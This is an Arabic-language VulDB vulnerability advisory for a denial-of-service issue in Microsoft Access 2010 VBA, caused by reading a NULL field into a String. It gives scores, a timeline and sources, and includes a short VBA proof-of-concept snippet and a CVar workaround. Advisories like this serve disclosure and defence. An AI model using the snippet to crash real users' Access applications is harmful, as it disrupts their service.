Microsoft Access 2010 VBA Datatype الحرمان من الخدمة

CVSS الدرجة المؤقتة للميتاسعر الإكسبلويت الحالي (≈)درجة اهتمام CTI
4.9$0-$5k0.00

الملخصالمعلومات

تم أكتشاف ثغرة أمنية في Microsoft Access 2010. وقد تم تصنيفها على أنها مشكلة صعبة الحل. الثغرة الأمنية متواجدة في دالة غير معروفة من العنصر VBA. عند التلاعب من خلال إدخال NULL في إطار Datatype ينتج الحرمان من الخدمة. يمكن شن الهجوم عن بُعد. علاوة على ذلك، يوجد استغلال متاح. يُستحسن اتباع الحل البديل المقترح.

التفاصيلالمعلومات

تم أكتشاف ثغرة أمنية في Microsoft Access 2010. وقد تم تصنيفها على أنها مشكلة صعبة الحل. الثغرة الأمنية متواجدة في دالة غير معروفة من العنصر VBA. عند التلاعب من خلال إدخال NULL في إطار Datatype ينتج الحرمان من الخدمة. عبر استخدام CWE في وصف المشكلة، سيتم الإشارة إلى CWE-404. تم العثور على الخلل في 04/07/2014. تم الإعلان عن الثغرة 21/04/2015 من قبل Marc Ruef من خلال scip AG تحت sID 66976 كنوع إدخال (scip VulDB). يمكن عرض الاستشارة من هنا scip.ch. لم يتم إعلام الشركة المالكة بهذه البيانات قبل نشرها.

يمكن شن الهجوم عن بُعد. التفاصيل التقنية متوفرة. شعبية هذه الثغرة أقل من المتوسط. علاوة على ذلك، يوجد استغلال متاح. تم الإعلان عن الثغرة للعامة ومن الممكن استغلالها. يحدد مشروع MITRE ATT&CK تقنية الهجوم على أنها T1499.

إذا كان هناك قيمة لـ إثبات المفهوم، فسيتم التصريح بأنه إثبات المفهوم. تستطيع تحميل الإكسبلويت من هنا scip.ch. باعتباره ثغرة يوم الصفر، كان السعر التقديري في السوق السوداء حوالي $5k-$25k. شفرة الاستغلال المستخدمة هي:

Public Sub NullExploit()
    Dim cn As New ADODB.Connection
    Dim rs As New ADODB.Recordset
    Dim sResult As String
    
    cn.Open "vuldb"
    rs.Open "SELECT * FROM tbl_vulnerabilities WHERE id='66976'", cn
    
    With rs
        If Not .EOF And Not .BOF Then
            sResult = .Fields("source_cve") 'will cause DoS
        End If
    End With


    MsgBox sResult


    rs.Close
    Set rs = Nothing
    cn.Close
    Set cn = Nothing
End Sub

يُستحسن اتباع الحل البديل المقترح. سيتم التعامل مع الثغرة الأمنية باستخدام الكود التالي:

sResult = CVar(.Fields("source_cve"))

منتجالمعلومات

النوع

المجهز

الأسم

النسخة

الرخصة

موقع إلكتروني

CPE 2.3المعلومات

CPE 2.2المعلومات

CVSSv4المعلومات

VulDB متجه: 🔍
VulDB الاعتمادية: 🔍

CVSSv3المعلومات

VulDB الدرجة الأساسية للميتا: 5.3
VulDB الدرجة المؤقتة للميتا: 4.9

VulDB الدرجة الأساسية: 5.3
VulDB الدرجة المؤقتة: 4.9
VulDB متجه: 🔍
VulDB الاعتمادية: 🔍

CVSSv2المعلومات

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
متجهالتعقيدتوثيقالسريةالأمانةالتوفر
افتحافتحافتحافتحافتحافتح
افتحافتحافتحافتحافتحافتح
افتحافتحافتحافتحافتحافتح

VulDB الدرجة الأساسية: 🔍
VulDB الدرجة المؤقتة: 🔍
VulDB الاعتمادية: 🔍

استغلالالمعلومات

الفئة: الحرمان من الخدمة
CWE: CWE-404
CAPEC: 🔍
ATT&CK: 🔍

ملموس: لا
محلي: لا
عن بُعد: نعم

التوفر: 🔍
وصول: عام
الحالة: إثبات المفهوم
المؤلف: Marc Ruef
لغة البرمجة: 🔍
تحميل: 🔍
تقدير السعر: 🔍
تقدير السعر الحالي: 🔍

0-Dayافتحافتحافتحافتح
اليومافتحافتحافتحافتح

استخبارات التهديدالمعلومات

الاهتمام: 🔍
الفاعلون النشطون: 🔍
مجموعات APT النشطة: 🔍

إجراءات مضادةالمعلومات

التوصية: حل بديل
الحالة: 🔍

زمن الاستجابة: 🔍
زمن الهجوم الفوري: 🔍
زمن التعرض: 🔍
وقت تأخير الاستغلال: 🔍

الجدول الزمنيالمعلومات

04/07/2014 🔍
04/07/2014 +0 أيام 🔍
04/07/2014 +0 أيام 🔍
05/07/2014 +1 أيام 🔍
21/04/2015 +290 أيام 🔍
21/04/2015 +0 أيام 🔍
21/04/2015 +0 أيام 🔍
08/10/2018 +1266 أيام 🔍

المصادرالمعلومات

المجهز: microsoft.com

استشارة: sID 66976
باحث: Marc Ruef
منظمة: scip AG
الحالة: مؤكد

GCVE (VulDB): GCVE-100-66976
scip Labs: https://www.scip.ch/en/?labs.20161013

إدخالالمعلومات

تم الإنشاء: 04/07/2014 12:00 PM
تم التحديث: 08/10/2018 03:09 PM
التغييرات: 04/07/2014 12:00 PM (63), 08/10/2018 03:09 PM (2)
كامل: 🔍
Cache ID: 216::103

VulDB is the best source for vulnerability data and more expert information about this specific topic.

مناقشة

لا توجد تعليقات بعد اللغات: ar + fa + en.

يرجى تسجيل الدخول حتى تتمكن من التعليق

التالي نظرة عامة السابق

Want to stay up to date on a daily basis?

Enable the mail alert feature now!